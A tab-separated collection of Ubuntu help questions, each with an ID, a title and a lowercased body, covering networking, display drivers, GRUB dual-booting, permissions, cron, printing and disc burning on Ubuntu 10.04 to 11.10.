54302	is it possible to use nmcli completely without nm-applet ?	since i do n't use gnome now and try wmii , the nm-applet is no longer available for me.i know there is nmcli for the control . what i 'm really interested in is that can it really be a substitute for nm-applet . man nmcli , there are these words , which makes me confused : it is not meant as a replacement of nm-applet or other similar clients . what does other similar clients mean ? the use case comprise : servers , headless machines : no gui is available ; then nmcli is used to talk directly to networkmanager and control only system-wide connections . user sessions : for this case , nmcli can talk to nm-applet to find user connections.it can still talk directly to networkmanager for manipulating these connections . as nmcli does n't have direct access to user configuration data in gconf , nm-applet handles that itself . that may , for example , cause the applet to pop up keyring dialogs when secrets are needed . as nmcli can work directly without x , why ca n't it work as well when secrets are needed ? ps . is there any alternate easy approach to control connections using command line ?
54303	gui for editing menu in xubuntu	i see that xubuntu has package gnome-menus , but i can not find the command to run the editor it should contain . i found a small editor but it does not allow new entries and alacarte tries to install whole gnome ... so i 'm looking for a menu editor that will allow me to : add new launchers , edit existing ones move existing ones to different categories create new categories wo n't install bazillion dependencies : )
54309	server keeps dropping active connections , but pings	i have a very frustrating problem with a new server i built . on every machine that sshes in ( or any other connection ) , the connection gets dropped randomly between immediately , and 30 minutes into the session , while the user is actively using the system remotely ( typing , etc ) . before , during and after the disconnection , the system responds to pings regularly ( 0 % packet loss ) . it takes about 5-10 minutes before i can make a connection again . i have tried restarting ssh , apache , etc on the server and rebooting the server . i even removed and reinstalled these services and this still happens . i have disabled iptables , ufw and removed firestarter . what might be causing these random disconnects ?
54311	no hdmi output on an ati x1250	i 'm trying to run ubuntu 11.04 with on board ati x1250 . the ati legacy driver ca n't be installed on 11.04 so i 'm using the default ubuntu driver . i ca n't seem to get hdmi out working .
54312	unable to unmount /proc	i started customizing live ubuntu cd . i followed all the steps in this post but i am not able to unmount the /proc . please look @ the below error.. the error says some process where running but i am not able to figure out the process.. can anyone help ? error root @ karthick : / # umount /proc/ umount : /proc : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) )
54315	how to install a gui package from terminal when creating a live cd ?	i am in the process of customizing a live ubuntu cd . there are some packages which i would like to install , but they are gui packages . how to install gui packages from terminal ? for example : adobe air . update : when installing the adobe air application remotely . i get the following error root @ user193 : ~ # ./adobeairinstaller.bin ( /tmp/air.fjiif3/setup:2630 ) : gtk-warning ** : can not open display :
54319	hosting a website with ubuntu server 11.04	was a tie between here and server fault , and i decided that it belongs more here . anyway , i am seeking to host a website on my computer using ubuntu server 11.04 . i 've got just a few questions . first off , does anyone know of any good tutorials , guides , or other documentation for learning their way around the terminal ? i know the basics , but any sort of in-depth guide would be absolutely lovely . i know that it is possible to install a gui , but i 'd just honestly enjoy working with and learning the terminal more anyway , and i 'm certain i 'll have to learn it at some point in my life . secondly , do any of you have links to videos or ( preferably ) written guides on how i can set it up so that others may access and view the pages and files i upload ? final thought : i am running ubuntu server in a virtual machine as all the spare computers in my home have fallen victim to my screwdriver . would this give me any issues ? i am aware that desktops are generally not built for long periods of activity . final thought ps : thank you all so much for any assistance that you can provide . it is incredibly appreciated . ( ｡◕‿◕｡ )
54321	how do i give multiple users access to a windows ntfs partition ?	i have usb hard-drive connected to my ubuntu ( 11.04 ) machine . every time i reboot the computer and login it mounts the hard-drive . since the disk has ntfs on it , linux assigns some user to be the owner of the files on the disk . so all files on the disk appear owned by one user and only that user can see the files . i use two user accounts on my computer and often switch between them . once i switch to other user account , i can no longer access contents of the disk because it is owned by my first user account . is there anything can be done about it except mounting it via /etc/fstab ? thanks .
54329	how to generate unique hardware hash ?	i wan na know that is there 's a way , by which we can generate a unique hardware hash of particular machine ? the hash should be unique to the machine and hash should be different even two machines are of same configuration . is it possible ?
54333	where is firefox 's auto-fill information stored ?	i need to retrieve one text-box text on an ubuntu installation i ca n't boot anymore ( thank you fedora ! ) on one specific website . where is the form information stored and how can i retrieve it ?
54337	printer driver for konica minolta pagepro 1490mf	i bought a laser printer konica pagepro 1490 mf , but i can not find the drivers . can anyone help me ? thanks in advance
54343	unable to upload files via any browser or application	i am simply trying to upload photos to various online services . i am unable to upload files to the following services : gmail ( as attachment ) picasa web albums ( via shotwell , picasa , f-spot , googlecl , or browsers chrome/ff ) facebook ( via shotwell , f-spot , or browsers chrome/ff ) dropbox etc . basically i ca n't upload anything in all cases of browser based attempts i can can attach/queue files , but then there is no data going out . for apps such as shotwell , i can log in to services , but files never upload and eventually timeout saying the remote service can not be reached . i have tried via wifi and wired connection , via the same o2 broadband router . other machines ( windows , osx ) on the same network can upload files without a problem . i have not tried via a different broadband connection yet as i do n't currently have access to one . my setup : samsung n220 w/ realtek 8192e wireless controller using ndiswrapper ubuntu 10.10 maverick , all packages up to date happy to provide any further information , logs , etc . or anything that will help with troubleshooting . i consider myself a reasonably technical person and this problem is doing my head in !
54347	why do keystrokes in `` less '' / '' more '' sometimes require a < enter > , when i use a pipe ?	i love the pipe to feed long text output into less ( or more ) to make it more readable . it 's only on ubuntu that i observed a uncommon behavior : sometimes in less keystrokes are not processed immediately . it 's like i have to `` confirm '' them with < enter > . for example less opens , text is displayed , i hit < space > ( nothing happens ) , i hit < enter > ( page scrolls down now ) . this is very annoying , as it makes less practically unusable because the also messes up the terminal output . it does n't happen for all piped commands . one example is : php -- rc pdo | less i 've never seen this happen on any other linux distribution .
54351	is is possible to have a different sources.list file on the same machine , and each assigned to a different user account ?	i want to set up a user account on my laptop to access the network of my office , and in order to do that i need to install applications using my office ubuntu repos , is it possible to create a sources list file to use only by 1 user account , and the rest to use the common sources ?
54359	how to change sources.list directory	the default directory of sources.list is /etc/apt and when we call apt-get update system store package information in /var/lib/apt and synaptic or package manager read information from there . suppose i have some packages already downloaded in hard disk . so if read package info ( sources.list ) from desktop and add package information in another directory then i can use synaptic or apt to safely install packages and then restore again sources.list directory . procedure will be like this : have packages in desktop with sources.list information of packages directory ( anywhere ) change default directory to desktop synaptic or apt will read from desktop and save information in another place install packages restore back previous directory information
54363	is there any record of group membership changes ?	i followed bad instructions and left the -a out of : usermod -a -g wireshark ak now all of my groups have been lost , including sudo permissions : $ groups ak wireshark if i understand correctly , i should be able to fix this by booting to the recovery option in grub , but i 'm not sure what groups need to be added back . where can i check to find out what groups i used to be in ?
54364	how do you set the timezone for crontab ?	i have set up acpi wakeup so my laptop wakes up at a certain time each morning . the timezone for this is utc . i want to set up my crontabs also using utc so they fit with the wakeup alarm . how do you do it ? i 've tried editing /etc/default/cron to include : tz= '' utc '' but it does n't work . ( i 've also tried tz=utc and tz= '' utc/gmt '' ) any ideas ?
54367	how can i `` verify data after burn '' when using brasero to burn a data dvd ?	i have been trying ubuntu for the last couple weeks . i have always used windows os in the past . using windows i am able to burn backup `` data '' dvds and the burning software allows me to `` verify data after burn . '' when activated , after a burn is completed the data that was burned to the disc will be checked for errors . this is important for ensuring that the burned data are the same as what 's on the hdd and no errors or corruption has occured . can i do this using ubuntu ( brasero ) ? i have a folder filled with files and sub-folders that i would like to burn to dvd as a backup to the data i have on the harddrive . but i ca n't foresee making backup dvds while using ubuntu if there 's no way to verify the data after the burn is completed .
54368	no network access due to wlan0 : avahi	i have a laptop with ubuntu 11.04 . failed to connect my home wireless network , which is composed of a modem and a netgear router . ifconfig showing : wlan0 link encap : ethernet hwaddr 00:24 : d6:07:2b : a2 up broadcast multicast mtu:1500 metric:1 rx packets:30238 errors:0 dropped:0 overruns:0 frame:0 tx packets:24005 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:26945081 ( 26.9 mb ) tx bytes:3169731 ( 3.1 mb ) wlan0 : avahi link encap : ethernet hwaddr 00:24 : d6:07:2b : a2 inet addr:169.254.6.188 bcast:169.254.255.255 mask:255.255.0.0 up broadcast multicast mtu:1500 metric:1 iwconfig showing : wlan0 ieee 802.11abgn essid : '' mywirelessnetwork '' mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off i do not quite understand how the virtual interface wlan0 : avahi appeared . my guess was , my request sudo dhclient wlan0 failed to get a valid ip , although i did not get any error message from running that command . i executed sudo dhclient wlan0 again , but still no error message or network connection . later today , i tried to connect to a public wireless network . still got the same error . but when i reboot my machine , no such problems . i am confused by the wired situations . is there anything wrong with my network configuration ? what should i do if i encounter similar problems in future ?
54369	how to remove startup program/service which starts during booting ?	i installed ec2 cloud tools . which made me wait for 60 sec during boot-up . later i removed the tool but unfortunately the program was still there and waits for 60 sec during startup . how to i see what program/service starts during bootup and how do i remove it .
54370	hdmi with sony bravia : unsupported signal	i recently got a sony bravia hd tv but ca n't connect it to my ubuntu laptop . i 've a dell with intel gm965 graphics . when i connect to the tv using an hdmi cable , it says : unsupported signal , check device output . it is detected by ubuntu just fine . i tried with different resolutions in the display settings but could n't get it to work . also , i could n't find settings for refresh rate ( i 'm on 11.10 ) . the tv/cable is fine as ps3 works perfectly well .
54375	how do you make a bridge between two connections ?	i 've done this : created a wireless network via the network manager . i have internet through a wire . i want create a wireless network and share my internet access that i get from a wire . @ thex told me that i have to bridge the two connections but i do n't know how to . the setup i want is this : sharing connections through the wireless getting internet through a wire @ thex gave me a link that might work . i need to connect eth0 with wlan0 has anyone got this to work in 11.10 ?
54379	vlc for flash video	is it possible to play all flash videos using vlc because flash is consuming a lot of processing power ? in addition with vlc i will be able to record every stream for example ustream etc . i am using ubuntu 11.04 .
54382	laptop ( thinkpad x201t ) with i7 overheats and shuts down . how to manage turbo boost ?	i have lenovo thinkpad x201 tablet with ubuntu 11.04. when i run mathematica or stress , the laptop overheats and shuts down . i loose all my work . i would think that turbo boost ( for intel i7 ) turns on and does n't turn off when the temperature is too hot . anyway to manage that ?
54386	power menu does not have shutdown and restart	i have ubuntu 11.04 and i works perfect . i do not know what happened but for no reason the logout , restart and shutdown options disappeared from power menu . i did restart it more than one time maybe it will solve the problem . also , i did all the updates and still the same thing . i check the gconf-editor on /apps/indicator-session , all the options of suppress_* is not checked . i 've also tried purging the session indicator packages before reinstalling them : sudo apt-get purge indicator-session indicator-applet-session sudo apt-get install indicator-session indicator-applet-session ubuntu-desktop i do not know when this problem happened but 2 weeks ago was every thing fine .
54387	windows partition wo n't show up during installing	i created empty space in my hard drive so i can install ubuntu . but when i go to the installation screen , there is no option to install alongside windows . when i choose custom , the hard drive shows up as completely blank ! i tried the usb way , tried turning the hdd back to ide from ahci , but no hope . i do n't want to install inside windows because i want to be able to access windows files from ubuntu . any help would be appreciated .
54395	location of file folders of installed programs	i 'm new to ubuntu and will like to know where i can find the location of program files of programs installed from the ubuntu software center or the command line interface
54396	how can i control access of mounted files to other accounts ?	when i mount files via cryptkeeper and truecrypt they show up on the desktop of admin account but also guest and family accounts . how can i stop mounted files and hard drives to appear and being accessed from family and guest accounts ?
54399	is there a way to control speed internet access to wireless connections ?	i connect to the internet on my pc via ethernet and wireless with a laptop . i want to control the speed of laptop wireless connection so when both are running i still have enough speed on pc to work and who ever us using wireless connection has less speed . is this possible ? . i mean to control speed up/down for pc and for laptop . with wondershaper i can only control up/down speed general i need to set different speeds for both computers .
54406	prevent screenlet icons from showing up in the unity panel ?	after installing a screenlet in ubuntu 11.04 , it appears in the unity panel as a running program wasting space ( in my case , named folderviewscreenlet.py ) , and i 've found no way to hide it ( aside of closing the screenlet , but that 's beside the point ) is there any way to restrict or hide the icon from the panel ? screenshot :
54410	disk usage analyzer reports that the .ecryptfs file is taking up as much space as the home drive	i selected `` encrypt home partition '' when i set up my netbook with ubuntu . the disk usage analyzer now reports that twice as much space is taken up than actually is used . i have seen this question asked a few times , but the response typically tends to be along the lines of `` .ecrypts/.private are your actual home drive , and is encrypted , and the one that shows up as the home drive is virtual , it 's not actually taking up hard drive space , '' which perfectly identifies the problem but is not helpful in fixing it . now , regardless of whether the hard drive is actually full , the system is treating it as full . i keep getting warnings that i have 10mb of space left ; i ca n't update my dropbox folder ; i ca n't move files around efficiently ; the machine seems unhappy , etc . is the only way to fix this to do the risky decryption procedure that involves permanently removing the home folder from the machine and possibly not being able to decrypt the backup ? or is there some way to fix the disk usage analyzer so that it does n't count the virtual home folder along with the private folder ? i would prefer to keep my data encrypted . thanks !
54414	ssl not working on eth0	all secure connections like https , ssh are not working when i connect through eth0 . however they work perfectly fine when connected through wireless . is this some issue with certificates in the system ? or is it got to do with the network ? how to fix this issue ? will deleting all certificates help , if so where to find and delete those certificates ? please suggest . thanks update by `` dont't work '' i mean all the connections requiring ssl do n't work , like ssh , https . when i do ssh i get an error `` connection refused by remote computer '' . other normal connections work however . regarding firewall , there is no rule , i just see all as accept . the wireless connection , which goes through same gateway works fine though .
54416	creating a dedicated grub partition before installing ubuntu	i have suffered from boot configuration a lot . if windows is installed above ubuntu , ubuntu does n't boot . if ubuntu is installed above windows then windows goes away . of course , reinstalling grub fixes these things , but i suppose having a dedicated grub partition is going to help me a lot . so i have fresh windows installed . i am about to install ubuntu 11.04 . but before i install ubuntu , i want to create a dedicated boot partition first . i thought creating a separate partition of about 200 mb and mounting it as /boot was called dedicated partition but it seems it is not . how to create a dedicated boot partition during ubuntu installation ?
54417	how to disable keys from the keyboard ?	at work i got a new laptop with a full keyboard ( it has numpad ) , but the laptop is not that big , and because of that the keys are relatively small , which means i am constantly finding myself pressing keys accidentally on the numpad part , is there a way to simply disable specific keys that i simply do n't want ?
54419	how to perform a distribution upgrade using apt-fast ?	my distribution upgrade from natty to ocelot has been running on and off for quite some time . the speeds at which it downloads is really slow , and i was wondering if there was a way to use the apt-fast command to perform a distribution upgrade to ocelot ? i looked into the source of do-release-upgrade but it uses the upgrade module in python , and i could not find a reference to apt-get or wget which i could have replaced with apt-fast or axel . maybe if i could just perform an update via do-release-upgrade and then run apt-fast upgrade when it asks me to press enter after updating the software sources ? would it work ?
54422	is there a way to disable or limit system xrandr probes ?	i am currently suffering from a video card related bug ( s-video output does n't work in natty ) which causes my tv screen to flicker every 10 seconds . according to a launchpad contributor , this is probably caused by the system running a regular xrandr probe . is there any way to safely disable this probe while i wait for a bugfix ? i want to be able to : run my machine as normal when the s-video cable is not plugged in plug in the cable and choose to output to the tv using the monitor preferences tool unplug the cable and switch back to normal resolution ( low priority ) boot up with the cable plugged in and have it be detected and used not mess everything up is this possible ? a system setting would be preferable , but a script/command to run after i 've got the tv hooked up is acceptable .
54425	how to convert cups to an upstart job ?	i 'm having some issues with cups on 10.04 ( 64 bit ) . i 'm running about 200+ machines with the same image and cups crashes a lot . what i 'd like to do is create an upstart job to monitor and respawn cupsd if it crashes . i 've tried to find the solution myself but i 'm struggling . can anyone provide some help ? kind regards , darknomel
54426	pcie ethernet controller that works with 11.04 ?	it appears that an awry cable has damaged both of the ethernet ports ( left most pin ) on my $ 600 motherboard . furious . are there any pci-express nic brands that will work well on ubuntu out of the box ? meaning , without having to mess with drivers etc . ?
54429	can i blacklist an appindicator ?	i 've whitelisted some indicators for apps that do n't yet have unity-compliant appindicators . is there any way to blacklist appindicators for apps that are unity-compliant ( not old-style indicators ) but do n't provide a `` do n't show in the system tray '' option ? any working solutions to ban an appindicator from being displayed , gui- or cli-based , are welcome . a valid alternative would be a way to hide the indicator in a similar fashion to how you can show/hide system tray icons in windows 7 . according to the answer to this closed question this is not currently possible in ubuntu . techniques that cover old indicators as well as new indicators are also valid . ( removing items from the systray-whitelist only works for old indicators . )
54430	how to fix windows 7 dual-boot after upgrade to 11.04 ?	i had windows 7 and ubuntu 10.04 working in prefect harmony on a dual boot system , where win7 was the default os . this was until i let ubuntu upgrade itself to 11.04 . ever since that , the default os is now ubuntu . i entered startup manager from ubuntu and changed the default to win7 , but still - effectively whenever i reboot ubuntu starts up . when i enter startup manager again it seems as if win7 is the default ... what should i do ?
54435	installing ubuntu at my laptop ( having windows 7 already - dual boot )	i want to install ubuntu ( 11.04 ) at my laptop wich already has windows 7 . the laptop has one hdd which came with 3 partitions.one hidden for the recovery ( asus ) the one as the partition for the os ( 150gb ) and the other as data.i 've shrunk the latter and created unallocated space of about 25gb for ubuntu . now the step to follow is to boot into ubuntu live cd that i have and after that install ubuntu . how to properly select the unallocated space to install it ( and be sure that i am selecting that and not any data ) ? when i should install grub ? which grub ? ( 2/legacy ) ? and how should i do that ? thank you for your time !
54436	how to hide text on titlebar ?	i want to change the height of title-bar , but until now ( as i know ) there 's only one way to do that : change the font-size of windows title font ( in appearance preferences ) . so far so good except the big size of the text . how could i disable ( or hide ) the text ?
54437	hd 6450 radeon problems with installation	i bought a asus pundit p6 with an icore5 and a radeon hd 6450 . starting ubuntu 11.04 from a live-usb-stick doese n't make any troube , but after installing 11.04 ( 64bit and 32bit , subquestion : what 's better ? ) pc starts from hdd ... ubuntu-logo shows flickering .. intro-music plays but the logo does n't go away . what to do ( remember i 'm no linux-pro ! ) ?
54439	how do i add another distribution to grub2 ?	i 've installed gentoo in one of my hard disks . the whole hard disk is for that distro . i want a dual-boot in grub to start ubuntu or gentoo . device boot start end blocks id system /dev/sdb1 * 1 7298 58614752+ 83 linux /dev/sdf1 1 125 1000000 82 linux swap / solaris partition 1 does not end on cylinder boundary . /dev/sdf2 125 30402 243196503+ 83 linux partition 2 does not end on cylinder boundary . /dev/sdb is ubuntu root and /dev/sdf is gentoo . i execute sudo os-prober and it shows : /dev/sdf2 : gentoo base system release 2.0.2 : gentoo : linux then i execute sudo update-grub : generating grub.cfg ... found linux image : /boot/vmlinuz-3.0.0-6-core2 found initrd image : /boot/initrd.img-3.0.0-6-core2 found linux image : /boot/vmlinuz-3.0-3-core2 found initrd image : /boot/initrd.img-3.0-3-core2 found memtest86+ image : /boot/memtest86+.bin found gentoo base system release 2.0.2 on /dev/sdf2 done but when i restart , grub menu does n't show the gentoo entry . i did n't set the boot flag in gentoo disk , is this the problem ? the disk boot is the ubuntu disk , not gentoo . my actual /boot/grub/grub.cfg # # do not edit this file # # it is automatically generated by /usr/sbin/grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then load_env fi set default= '' $ { saved_entry } '' if [ $ { prev_saved_entry } ] ; then set saved_entry= $ { prev_saved_entry } save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z $ { boot_once } ] ; then saved_entry= $ { chosen } save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n $ { have_grubenv } ] ; then if [ -z $ { boot_once } ] ; then save_env recordfail ; fi ; fi } insmod ext2 set root= ' ( hd1,1 ) ' search -- no-floppy -- fs-uuid -- set ae2f99e4-5e5d-480d-abce-e66478f0c72f if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=1280x1024 insmod gfxterm insmod vbe if terminal_output gfxterm ; then true ; else # for backward compatibility with versions of terminal.mod that don't # understand terminal_output terminal gfxterm fi fi insmod ext2 set root= ' ( hd1,1 ) ' search -- no-floppy -- fs-uuid -- set ae2f99e4-5e5d-480d-abce-e66478f0c72f set locale_dir= ( $ root ) /boot/grub/locale set lang=es insmod gettext if [ $ { recordfail } = 1 ] ; then set timeout=-1 else set timeout=4 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , con linux 3.0.0-6-core2 ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd1,1 ) ' search -- no-floppy -- fs-uuid -- set ae2f99e4-5e5d-480d-abce-e66478f0c72f linux /boot/vmlinuz-3.0.0-6-core2 root=uuid=ae2f99e4-5e5d-480d-abce-e66478f0c72f ro crashkernel=384m-2g:64m,2g-:128m quiet splash nomodeset video=uvesafb : mode_option=1280x1024-16 , mtrr=3 , scroll=ywrap acpi_osi=linux initrd /boot/initrd.img-3.0.0-6-core2 } menuentry 'ubuntu , con linux 3.0.0-6-core2 ( modo recuperaci贸n ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd1,1 ) ' search -- no-floppy -- fs-uuid -- set ae2f99e4-5e5d-480d-abce-e66478f0c72f echo 'cargando linux 3.0.0-6-core2 ... ' linux /boot/vmlinuz-3.0.0-6-core2 root=uuid=ae2f99e4-5e5d-480d-abce-e66478f0c72f ro single echo 'cargando el disco ram inicial ... ' initrd /boot/initrd.img-3.0.0-6-core2 } menuentry 'ubuntu , con linux 3.0-3-core2 ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd1,1 ) ' search -- no-floppy -- fs-uuid -- set ae2f99e4-5e5d-480d-abce-e66478f0c72f linux /boot/vmlinuz-3.0-3-core2 root=uuid=ae2f99e4-5e5d-480d-abce-e66478f0c72f ro crashkernel=384m-2g:64m,2g-:128m quiet splash nomodeset video=uvesafb : mode_option=1280x1024-16 , mtrr=3 , scroll=ywrap acpi_osi=linux initrd /boot/initrd.img-3.0-3-core2 } menuentry 'ubuntu , con linux 3.0-3-core2 ( modo recuperaci贸n ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd1,1 ) ' search -- no-floppy -- fs-uuid -- set ae2f99e4-5e5d-480d-abce-e66478f0c72f echo 'cargando linux 3.0-3-core2 ... ' linux /boot/vmlinuz-3.0-3-core2 root=uuid=ae2f99e4-5e5d-480d-abce-e66478f0c72f ro single echo 'cargando el disco ram inicial ... ' initrd /boot/initrd.img-3.0-3-core2 } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # #
54441	how to configure two nic for dns & resolv.conf & how to eth0 dns forwards to eth1 & gw	i have two nics . here 's my /etc/network/interfaces : auto eth0 iface eth0 inet dhcp //for internet auto eth1 iface eth1 inet static //for lan address 20.x.x.x.x netmask 255.255.255.0 broadcast 20.x.x.x.255 gateway 20.x.x.1 which gateway is default ? how do i route gateway to default gateway ? when i run networking restart , resolv.conf domain name server is replaced with the dns server of the internet , how do i configure resolv.conf ?
54443	resolution changed - > unity launcher now in wrong location	my old tft broke down . i have two actually . i had to replace the main one ( originally i had 1980x1200 resolution ) with one with 1980x1080 . i fixed the resolution in the xorg.conf with the nvidia settings tool . however unity/gnome does n't seem to notice the resolution has changed ? now my unity sidebar is only partially visible on the screen . how can i move it so it is fully visible again ? i have not found any settings for that ? update : also on the login screen , the bar that would allow me to choose a non-unity classic session is not visible .
54444	suspend and hibernate do n't work on a hp pavilion dv6	i just installed kubuntu 11.04 on my laptop which a hp pavilion dv6 , and suspend/hibernate do n't seem to work . more specifically , when i try to get out of sleep/hibernation mode , the computer does restart but the screen remains black while the fan starts and the computer gets hot . i have to reboot by pressing on the power button . i was wondering whether anyone has come up with this problem and might have found a fix for it . thanks ! f edit : here are the files requested /var/log/kern.log http : //paste.ubuntu.com/651863/ and /var/log/pm-suspend.log http : //paste.ubuntu.com/651865/
54446	login to ubuntu one from iframe	i am creating a private portal ( a private website where i automatically auto-log to all my favorite website ) . every website is loaded in an iframe . i am looking for a way to autologin to ubuntuone . i tried to post a automatically completed form , but ubuntuone uses a unique key for each authentication . i can not use jquery to sumbit the form from outside of the iframe because it 's not the same domain . maybe in php ? this post talk about ubuntu one auth and php but i do n't know how php could interact with the api . may you have some example ? thanks for ideas and your help .
54448	banshee podcasts episodes	recently i have downloaded all the episodes of a podcast to banshee . i can only see the first couple dozen of them in the player screen , yet if i look in the downloads folder or searched them in banshee they are there . how can i make banshee show all of them in the browsing screen ?
54451	how do i define the pulseaudio server during login ?	i frequently need to login from my desktop into my laptop using freenx , i am able to redirect the audio from session running on the laptop by setting the pulse audio default server using the `` padevchooser '' applet , setting it to the ip of my desktop . is there an easy way to achieve this from the freenx session login ? for example overriding the pa default server from the .bash_profile ?
54452	core animation framework update	edit : the answer to this can be found much further down , but suffice it to say that all the effects can be achieved with compiz , it is simply a question of man power needed to implement such features . thank you to the ask ubuntu staff and members for their assistance in clearing this up for me . end edit . i 'm not trying to be antagonistic , but my last post on the subject was closed without the question being answered and labeled as not a real question so i 'll ask again . is there currently any effort to bring a unified animation framework to ubuntu that utilizes opengl akin to core animation so that effects that appear in the various linux dock programs can be utilized across the all programs ( nautilus banshee etc ) using a common method ? in my previous posts , i referenced things like stacks in osx as an example . i am aware that awn , docky , and cairo dock do things like this and that compiz does more than just wobbly windows . i am not asking to copy some of the functionality like stacks and the genie effect , which can already be copied to an extent using a combination of those programs , i am asking if there will be a way to bring those types of animations to the whole operating system like osx . currently those dock programs all do effects differently and they do n't extend beyond the dock , though they rely on compiz for their compositing . again , i am not trying to be antagonistic , but i genuinely feel that i asked a question , perhaps i did n't ask it clearly enough , and that it was n't totally answered . thank you for your consideration and time in this matter .
54456	how can i install linux kernel 3.0 in 11.04 ?	recently linus torvalds announced the launch of next generation of the linux kernel : linux 3.0 . however , i have no idea how to update to this kernel version .
54459	how do i install polly ?	so i was reading over on omg ! ubuntu ! about this new ubuntu twitter client called `` polly '' , and i was wondering how to install it .
54460	in aws ubuntu ami server refused our key while ssh login	i just have created a large-instance for ubuntu-ami on amazon ec2 . generated a key pair & ssh open in firewall . now using puttygen i got ppk file since i am using window machine . now using publuc dns i am trying to connect to server but while fetching username and pressing enter key it says `` server refused our key '' . how to solve this problem . please someone help . thanks .
54462	can i make liferea faster ?	is there any way to make liferea faster in fetching feeds from google reader ? it certainly could be a quality rss reader but in my case it 's painfully slow .
54464	how to install intel corporation 2nd generation core processor family integrated graphics in ubuntu 11.04	i have recently installed ubuntu 11.04 in a dell inspiron 17r and everything is fine except that the system does n't recognize additional drivers . it says no proprietary drivers are in use on this system . 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series chipset family pci express root port 3 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series chipset family pci express root port 5 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series chipset family smbus controller ( rev 05 ) 01:00.0 network controller : intel corporation centrino wireless-n 1030 ( rev 34 ) 02:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) thanks for your time and help .
54476	what 's the difference between `` restart x '' and `` /etc/init.d/x restart '' ?	i normally use this command to restart my daemons ( e.g . vsftpd ) : $ sudo /etc/init.d/vsftpd restart early today i noticed it said that i can try restart ( 8 ) utility . i did : $ sudo restart vsftpd it worked . but when i tried to restart my apache2 : $ sudo restart apache2 > restart : unknown job : apache2 why are they different ? of course i can restart apache2 by /etc/init.d/apache2
54477	how to split a large mp3 into the different tracks ( also in mp3 )	i 've got this huge mp3 file of the recording of a concert and i want to split each music into it 's track so that when i burn into a cd audio it can have each track with a different song . what 's the best apps for doing this ?
54485	is taking an hour to install typical ?	i am having an core 2 dual processor of 2.96ghz speed and 4gb ram . my internet speed is 1mbps . still it took more than 1hr to install the ubuntu that too not properly . please help me know , is it common in such a high speed configure desktop for ubuntu to take sooooo long just to install .
54493	gnome 3 proxy settings	if i set my network proxy settings using gnome 3 manager in ubuntu 11.04 system settings like the following picture : chrome and firefox are not using those proxy settings when trying to connect to the internet . any suggestions ? is there an application like proxyfier for ubuntu ?
54502	how do i install sheetmaker ?	sheetmaker generates moviesheets and similar coversheets for tv-shows . i would like to install sheetmaker , but it looks a bit complicated for me . i have downloaded and followed the installation instructions from : http : //www.users.on.net/~garstev99/wdtv/installation.html and also from this source : http : //wdtvforum.com/main/index.php ? topic=7912.0 but have stacked on the first step - i ca n't run moduletest.pl in terminal - terminal is opening for 1-2seconds and then closing without any results . i 'll be very appreciated if someone could help me to execute this program . related question
54503	if an application has a gtk3 backend , should it be enabled for 11.10 ?	if an application has a gtk3 backend and a gtk2 backend , should the package maintainer compile it with the gtk3 backend or can he/she decide which backend to use ? can i file a bug if an application has a gtk3 backend but is compiled with the gtk2 backend ?
54504	can i burn a dvd with the `` disc at once ( dao ) '' setting using brasero ?	i prefer to always burn data discs with dao setting to get a reliable burn & wide-compatibility across players . i can find no dao setting option in brasero . what setting is brasero using to burn data dvds ? and can it be set to burn using dao ( disc at once ) ?
54507	add a new custom session ?	i would like to add a new session to the login screen ( the thing where you select `` ubuntu , ubuntu classic , etc '' to install a new gui on . how can i do this ?
